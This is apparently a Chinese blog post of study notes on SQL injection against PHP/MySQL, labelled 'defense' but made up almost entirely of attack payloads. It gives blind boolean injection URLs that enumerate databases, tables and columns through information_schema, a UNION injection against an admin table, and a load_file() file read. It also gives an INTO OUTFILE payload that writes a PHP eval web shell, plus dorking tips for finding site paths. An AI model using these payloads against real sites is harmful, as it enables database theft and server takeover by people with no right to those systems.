WEB安全 php+mysql5註入防禦(二)
阿新 • • 發佈:2017-11-27
tin 十六 data table into 一個數據庫 一個 mat 讀取配置文件
第四天:
新的註入函數:
- ascii()
- substring("string",n,m) n>=1
- limit n,m n>=0
- length()
- union 合並兩個或多個 SELECT 語句的結果集,不重復
- union all 同上,但允許重復數據
- select distinct 等同於select,但會去重
- load_file() 文件讀取
- into outfile 文件寫入
information_schema.schemata 存儲所有數據庫信息
- SCHEMA_NAME 數據庫名
- DEFAULT_CHARACTER_SET_NAME 數據庫編碼
//猜解當前數據庫長度、及庫名 http://127.0.0.1/first.php?x=1 and Length((database()))=5 //當前數據庫長度(數據庫名:sqlin) http://127.0.0.1/first.php?x=1 and ascii(substring((database()),1,1))=115 //猜解當前數據庫第一位,ascii(s)=115 http://127.0.0.1/first.php?x=1 and ascii(substring((database()),2,1))=113 //判斷數據庫個數 http://127.0.0.1/first.php?x=1 and (select count(schema_name) from information_schema.schemata)=6 //判斷所有數據庫長度 http://127.0.0.1/first.php?x=1 and length((select distinct schema_name from information_schema.schemata limit 0,1))=18 //等同於下一條 http://127.0.0.1/first.php?x=1 and Length((select distinct schema_name from `information_schema`.schemata limit 0,1))=18 //第一個數據庫 http://127.0.0.1/first.php?x=1 and Length((select distinct schema_name from `information_schema`.schemata limit 1,1))=5 http://127.0.0.1/first.php?x=1 and Length((select distinct schema_name from `information_schema`.schemata limit 2,1))=17 http://127.0.0.1/first.php?x=1 and Length((select distinct schema_name from `information_schema`.schemata limit 3,1))=5 http://127.0.0.1/first.php?x=1 and Length((select distinct schema_name from `information_schema`.schemata limit 4,1))=9 http://127.0.0.1/first.php?x=1 and Length((select distinct schema_name from `information_schema`.schemata limit 5,1))=4 http://127.0.0.1/first.php?x=1 and Length((select distinct schema_name from `information_schema`.schemata limit 6,1))>0 //不存在第7個數據庫 //猜解所有數據庫庫名 http://127.0.0.1/first.php?x=1 and ascii(substring((select distinct schema_name from `information_schema`.schemata limit 0,1),1,1))<79 //第一個數據庫名的第一個字符ascii值 http://127.0.0.1/first.php?x=1 and ascii(substring((select distinct schema_name from `information_schema`.schemata limit 1,1),1,1))<79 http://127.0.0.1/first.php?x=1 and length((SELECT table_name from information_schema.tables where table_schema=0x73716C696E limit 0,1))=4 //第一個數據庫的第一個表名的長度 http://127.0.0.1/first.php?x=1 and ascii(substring((SELECT column_name from information_schema.columns where table_schema=0x73716C696E and table_name=0x6E657773 limit 0,1),1,1))=105 (i) http://127.0.0.1/first.php?x=1 and ascii(substring((SELECT column_name from information_schema.columns where table_schema=0x73716C696E and table_name=0x6E657773 limit 0,1),2,1))=100 (d) 備: http://127.0.0.1/0/Production/PRODUCT_DETAIL.asp?id=1513 and 1=2 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from admin http://127.0.0.1/first.php?x=1 and ascii(substring ((0x41),1,1))=0x41 //抓包抓到的語句,substring後有一個空格,導致這段註入無效,可能是工具bug
文件讀取:
1.要麽使用“\\”,要麽使用“/”,避免使用“\”造成轉義
2.load_file("C:/phpStudy/WWW/first.php")可以寫成十六進制格式load_file(0xnnnnnnn)
http://127.0.0.1/first.php?x=1 union select load_file("C:/phpStudy/WWW/first.php"),2,3
文件寫入:
http://127.0.0.1/first.php?x=1 union select "<?php eval($_GET[‘caidao‘]); ?>",2,3 into outfile "C:/phpStudy/WWW/caidao.php"
網站路徑獲取方式:
1.報錯顯示,漏洞報錯
2.遺留文件:phpinfo.php、php.php、info.php、test.php
3.讀取配置文件
4.社工:域名即路徑、google搜索、inurl:edu.cn warning、
WEB安全 php+mysql5註入防禦(二)